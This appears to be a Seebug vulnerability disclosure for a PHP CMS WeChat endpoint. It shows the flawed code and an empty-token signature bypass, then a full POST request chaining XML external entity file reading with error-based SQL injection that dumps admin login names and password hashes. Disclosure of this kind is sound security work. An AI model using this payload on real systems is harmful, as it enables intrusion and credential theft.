rt。打包
app/weixin/notify.php
$wx=new weixin();
if($wx->check_signature()){
//用于更改通知地址
if(isset($_GET["echostr"])) die($_GET["echostr"]);
//被动响应消息和事件
response_msg();
}
function response_msg(){
global $dbm,$C;
$postStr = $GLOBALS["HTTP_RAW_POST_DATA"];
if(!empty($postStr)){
$postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA);
$fromUsername = $postObj->FromUserName;
$toUsername = $postObj->ToUserName;
$time = time();
//响应文本消息
$keyword = trim($postObj->Content);
$textTpl = "<xml>
<ToUserName><![CDATA[%s]]></ToUserName>
<FromUserName><![CDATA[%s]]></FromUserName>
<CreateTime>%s</CreateTime>
<MsgType><![CDATA[%s]]></MsgType>
%s
</xml>";
if(!empty($keyword)){
$msgType = "text";
$contentStr='';
//查询自动回复表
$rs=$dbm->query("select * from ".TB_PRE."weixin_auto_msg where find_in_set('".$keyword."',msg_key)");
if($rs['error']==''){
.........................
.............................
$contentStr='<Content><![CDATA['.$rs['error'].']]></Content>';
}
$resultStr = sprintf($textTpl, $fromUsername, $toUsername, $time, $msgType, $contentStr);
echo $resultStr;
}
一个典型的xml实体注入。 看到check_signature()。 class/weixin.class.php
public function check_signature(){
$signature = isset($_GET["signature"])?$_GET["signature"]:'';
$timestamp = isset($_GET["timestamp"])?$_GET["timestamp"]:'';
$nonce = isset($_GET["nonce"])?$_GET["nonce"]:'';
$token = WX_TOKEN;
$tmpArr = array($token, $timestamp, $nonce);
sort($tmpArr,SORT_STRING);
$tmpStr = implode( $tmpArr );
$tmpStr = sha1( $tmpStr );
if( $tmpStr == $signature ){
return true;
}else{
return false;
}
}
由于 WX_TOKEN 默认为空,所以我访问
/app/weixin/notify.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709
该程序安装时会强制要求用户改变后台路径,但是其路径会储存在 www/config/global.php里面。配合读取任意文件读取。 完整的post包
POST /app/weixin/notify.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie:
X-Forwarded-For: 127.x'.x.x.1
Connection: keep-alive
Content-Type: text/xml
Content-Length: 377
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE copyright [
<!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=file:///D:/Wamp/www/config/global.php">
]>
<xml>
<ToUserName>&test;</ToUserName>
<Content>123',msg_key) and 1=updatexml(1,concat(0x5c,(select concat(login_name,0x5c,login_pass) from mcms_user where login_level='100')),1)#</Content>
</xml>
注入出了数据,同时读出了文件内容,将base64解码 即可得到后台路径
暂无临时解决方案
暂无官方解决方案
暂无防护方案
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论